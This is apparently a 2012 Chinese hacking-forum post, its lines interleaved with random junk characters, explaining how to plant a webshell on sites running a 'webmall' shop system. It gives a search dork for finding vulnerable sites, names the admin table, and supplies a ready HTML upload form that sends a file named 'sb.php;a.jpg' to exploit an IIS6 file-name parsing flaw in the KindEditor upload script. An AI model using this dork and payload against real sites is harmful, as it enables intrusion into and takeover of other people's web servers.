关键字:inurl:webmall/detail.php?id
- g; ^7 H% t! M" F- C+ `6 ]( e, @
. f4 R% a7 ^/ v( t, u& X" j数据表:pwn_base_admin
d4 k& U e0 Z5 q9 K' M3 t , C- J& {4 J7 i, M h/ s( B
关于拿shell# }( T% J: \# N2 m) u& b
( V+ ?' Y6 {/ m/ ]: L! g5 l首先登录后台admin.php: [' R' Q! ]: s: o& ]& S" t. S
2 j0 s3 ]" |- m/ m0 S- v
看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。
5 ~6 s- l; i1 B3 b# j% c换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg
# {2 ?3 Y" p) }! ?7 d- O7 ~9 `0 Y然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的
/ f1 _/ A! J) ~9 F+ O9 g<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php"> 6 A" {9 ~: t }8 M$ }" M6 _; M
<input type="text" name="fileName" value="sb.php;a.jpg" /> . F" B! y3 a4 I( D1 _* O y
<input type="hidden" name="attachPath" value="news/pics/" />
0 w$ K+ i5 q* S3 j. D' [<input type="file" name="fileData" size="14" /></td>
3 K5 r2 j* v. w# }0 ]; ]8 z<input type="submit" name="button" value="确定" /> - o' Q0 T# s3 S6 v- P: p$ I! r
</form>
8 V( O8 ?; R, |; r" Q4 r5 }
# z( n1 \0 {3 M: q* Y5 l+ y: }首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。
/ C/ F/ Q/ \# x" e: b7 N. U+ k+ k% K
|
发表于 2012-11-9 20:52:15
收藏
支持
反对